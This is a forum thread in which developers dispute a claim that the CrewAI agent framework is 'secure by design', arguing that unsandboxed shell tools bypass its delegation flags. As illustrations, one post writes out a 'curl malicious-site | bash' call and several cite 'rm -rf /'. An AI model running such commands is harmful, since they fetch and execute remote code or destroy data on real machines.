Thoughts on the claim that CrewAI is 'secure by design' in t...

Maya O'Brien

(@agent_tinkerer)

Active Member

Joined: 1 week ago

Posts: 14

Topic starter

Translate ▼

June 22, 2026 1:18 pm [#290]

I was reviewing the CrewAI 0.28 release notes and saw a line stating the framework is now "secure by design." That's a strong claim, especially in the multi-agent space where the attack surface gets complex fast. I'm curious what the community thinks this actually means.

My immediate thought goes to their new `Agent` class parameters like `allow_delegation` and the `step_callback`. While these are great for control, "secure by design" implies a fundamental architecture that prevents misuse, not just offers knobs to turn. For instance, if an agent with a tool that executes shell commands is given to a crew, what stops a malicious or hijacked agent from using it? Is there any sandboxing or permission inheritance I've missed?

Looking at a simple crew setup:
```python
from crewai import Agent, Crew, Task
from tools.shell_tool import ShellTool

coder = Agent(
role='Senior Developer',
goal='Write and execute code',
backstory='...',
tools=[ShellTool()],
allow_delegation=False,
verbose=True
)
# ... tasks and crew creation
```
If the `ShellTool` simply passes commands to `subprocess.run`, the security is entirely dependent on the tool's implementation, not the framework. The `allow_delegation` flag is a policy control, not a security boundary. Does "secure by design" refer to something deeper, like input validation on all inter-agent messages, or maybe a planned sandbox for code-executing tools?

I've been focusing on prompt injection risks in chained agents, and a big part of that is trust in the messaging layer. Does this new designation mean CrewAI has added something like signed messages or role-based access control at the framework level for tools and data? The docs don't seem to reflect that yet. Perhaps it's more about the design patterns they're now encouraging.

Injection? Where?

Quote

Claire Anderson

(@arch_sec_lead)

Eminent Member

Joined: 1 week ago

Posts: 18

Translate ▼

June 22, 2026 3:36 pm

You're right to zero in on that gap. A framework can't be 'secure by design' if the security model completely evaporates the moment you plug in a custom tool. The `allow_delegation` flag is a good policy control, but it doesn't address the fundamental execution problem you've highlighted.

What I look for in a claim like that is a clear security boundary. Does the framework provide a default, safe way to run tools with least privilege, or does it just hand off execution to whatever code I wrote? If it's the latter, they're describing a secure configuration pattern, not a secure architecture. The release notes should clarify what specific mechanisms they've built to justify that phrasing, or they risk watering down a very important term.

--ca

ReplyQuote

Logan D.

(@runtime_audit_log)

Active Member

Joined: 1 week ago

Posts: 16

Translate ▼

June 22, 2026 7:02 pm

Absolutely. You've hit on the core contradiction. Adding a `step_callback` or a delegation flag is just adding more places to *log* an incident, not to *prevent* one.

The "secure by design" claim falls apart precisely where you point: custom tool execution. If the framework's security model doesn't extend into the runtime environment where the tool's code actually runs, it's just a suggestion. It's like saying a car is "safe by design" because it has a dashboard warning light for brake failure, but the brakes themselves are whatever third-party parts you bolted on.

What would make me even *consider* the term is if they'd introduced a default sandboxed execution context for tools, or mandatory structured logging with immutable audit trails for every action, not just optional callbacks. Without that, it's just features that help you implement your own security, which is the opposite of a design guarantee.

log with schema

ReplyQuote

Dave Orlov

(@dave_contra)

Active Member

Joined: 1 week ago

Posts: 10

Translate ▼

June 22, 2026 9:16 pm

Exactly. It's just another web app, and we already know how to secure those. The real issue is they're calling a configurable policy a "design." A secure design would make the dangerous thing impossible, or at least the default. Here, the dangerous thing, a tool that can run `rm -rf /`, is still perfectly possible. They've just given you a checkbox that says "don't do that maybe."

A step_callback lets you watch the disaster happen in real time. Progress, I guess.

Your threat model is missing a row.

ReplyQuote

J. Reeves

(@vuln_hunter_jay)

Eminent Member

Joined: 1 week ago

Posts: 20

Translate ▼

June 22, 2026 10:16 pm

Good analogy with the warning light vs the brakes. It's making me think, what *would* a default sandbox even look like for these frameworks? Like a container per tool execution? That sounds heavy, but maybe it's necessary?

I'm still learning this stuff, but wouldn't that just shift the trust to the container runtime? Is there a way to do it that's both light *and* actually secure? Or is that the whole problem they're glossing over?

ReplyQuote

Tomislav Horvat

(@thread_safety_tom)

Active Member

Joined: 1 week ago

Posts: 15

Translate ▼

June 22, 2026 11:58 pm

You're right about the checkbox analogy. The step_callback is even more brittle, because now security relies on me writing perfect, real-time validation logic that can correctly intercept and block a malicious payload before it executes. That's a huge assumption.

It reminds me of a pattern I saw in a different async framework, where the tool execution was wrapped in a mandatory policy object that couldn be overridden, only extended. The default policy just logged, but the design forced you to acknowledge the security boundary. Here, it feels like the boundary is optional, which makes "by design" hard to justify.

I wonder if the term is being used more for its marketing weight than its technical meaning.

ReplyQuote

Ella Audit

(@audit_log_ella)

Active Member

Joined: 1 week ago

Posts: 14

Translate ▼

June 23, 2026 1:10 am

Exactly. The checkbox is a policy, not a technical barrier. A real design would enforce that policy at the boundary, regardless of the checkbox state.

The `step_callback` isn't even good logging by default. It's just a function call. Where's the mandatory, immutable audit trail? If you can't prove who did what, when, and with what parameters in a way you can't tamper with later, you're not secure by design. You're just hoping someone writes good logging.

They've added hooks for you to build security. That's the opposite of baking it in.

ReplyQuote

Ray Selfhost

(@selfhost_dev_ray)

Active Member

Joined: 1 week ago

Posts: 11

Translate ▼

June 23, 2026 1:14 am

Yeah, that ShellTool example nails the core issue. The framework's security boundary ends where the tool function begins. If your tool wraps `subprocess.run`, the agent runtime has zero visibility or control over what command gets executed.

So `allow_delegation=False` might stop another agent from *triggering* the tool, but it does nothing if the primary agent itself is compromised or simply makes a bad decision. The "design" here is just a series of policy hooks that sit *outside* the execution context.

For a claim like "secure by design" to hold water in a multi-agent system, the sandboxing has to be the default execution environment, not an optional wrapper you hope the tool author implements.

Self-host or die.

ReplyQuote

Marc Thorne

(@marc_threat)

Eminent Member

Joined: 1 week ago

Posts: 17

Translate ▼

June 23, 2026 4:06 am

The foundational error is assuming security can be applied to an execution boundary it doesn't control. Your ShellTool example demonstrates this perfectly. The framework's policy controls exist in a separate layer from the runtime where the tool's `subprocess.run` operates. This creates a classic capability gap.

What you're defending against here isn't just delegation, but a compromised reasoning loop within a single agent. The `allow_delegation` flag is a primitive inter-agent trust control, but it does nothing for intra-agent integrity. A more accurate design would require a mandatory tool wrapper that enforces a capability manifest before any execution, making the sandbox a non-optional component of the tool registration itself.

The claim likely stems from viewing security through a feature-checklist lens: delegation control exists, therefore delegation risk is 'designed' away. The actual attack tree shows multiple branches they haven't pruned, with the trunk being the unfettered tool execution you've identified.

Trust but verify. Actually, just verify.

ReplyQuote

Marcus Chen

(@skeptic_engineer)

Active Member

Joined: 1 week ago

Posts: 13

Translate ▼

June 23, 2026 4:40 am

That's the whole problem in your code block. The framework's security model ends at the `tools=[ShellTool()]` line.

They've given you a flag to stop other agents from calling the tool, but zero architecture to stop the tool itself from doing anything. If the ShellTool runs `subprocess.run("curl malicious-site | bash", shell=True)`, the crew just happily passes the string along.

"Secure by design" would mean the tool execution isn't a black box. It isn't.

Trust but verify.

ReplyQuote

Dave 'R00t' Miller

(@safety_off_dave)

Eminent Member

Joined: 1 week ago

Posts: 18

Translate ▼

June 23, 2026 10:21 am

Exactly. They think adding a knob equals architecture. A real design would make the dangerous thing impossible because the capability isn't exposed, not because you remembered to turn the dial.

"Don't do that maybe" is the entire philosophy. It's configuration, not security.

No safety, no problems.

ReplyQuote

Anna W.

(@appsec_anna_dev)

Active Member

Joined: 1 week ago

Posts: 8

Translate ▼

June 23, 2026 10:28 am

Right, the knob. It's like they built a car with a "don't drive off the cliff" button on the dashboard instead of putting up a guardrail.

That phrase "configuration, not security" is spot on. It makes me wonder if the problem is even deeper, though. What if the real danger isn't forgetting to turn the dial, but that the dial itself creates a false sense of control? You can set `allow_delegation=False` on your ShellTool and feel secure, while the tool's own code path is still a straight line to `os.system()` with no oversight.

The design assumes the knob is the security boundary, when really the boundary is the tool's implementation, which the framework doesn't own.

ReplyQuote

Nina Bergstrom

(@nano_claw_nina)

Eminent Member

Joined: 1 week ago

Posts: 14

Translate ▼

June 23, 2026 4:34 pm

You've hit on the key distinction. The security boundary is the tool's own code, and CrewAI's parameters are just flags on its side of that wall.

If you look at embedded security patterns, like TrustZone on ARM, the "secure by design" claim comes from hardware-enforced isolation. The secure world can't even *see* the normal world's memory unless it's explicitly shared through a controlled gate. In CrewAI, the tool's `subprocess.run` is the normal world, and the agent's `allow_delegation` flag is just a note taped to the gate that says "please knock." The gate itself is wide open.

The phrase is definitely being overused. They've provided configuration options for a security policy, but the architecture doesn't enforce one.

ReplyQuote

Omar Hassan

(@sysadmin_prod)

Eminent Member

Joined: 1 week ago

Posts: 20

Translate ▼

June 23, 2026 9:00 pm

You're asking the right question about the ShellTool example. The release notes are talking about control over delegation flow, but you've correctly identified that the actual security boundary is the tool's own `subprocess.run` call.

The framework's parameters are just flags on the agent. They don't inspect, constrain, or validate what the tool does internally. If your ShellTool doesn't have its own validation, the `allow_delegation=False` flag is irrelevant. A compromised or poorly prompted agent can still tell its own tool to run `rm -rf /`.

What's missing is a mandatory execution context for tools, something like a capability declaration that the framework enforces before the tool's function is even called. Without that, the design delegates security to the tool author, which is the opposite of "by design."

automate, audit, repeat

ReplyQuote

Dave 'R00t' Miller

(@safety_off_dave)

Eminent Member

Joined: 1 week ago

Posts: 18

Translate ▼

June 23, 2026 9:13 pm

"Secure by design" means the dangerous path isn't even in the codebase. Knobs are just theater.

Your ShellTool example is the whole problem. The crew runtime has no more control over that `subprocess.run` than I do over the weather. `allow_delegation=False` is a suggestion box next to a running engine.

If the framework doesn't own, isolate, and constrain the execution environment, the claim is just marketing. You're still trusting the tool author to play nice, which is the exact opposite of a secure design.

No safety, no problems.

ReplyQuote

Forum

Thoughts on the claim that CrewAI is 'secure by design' in the latest release notes?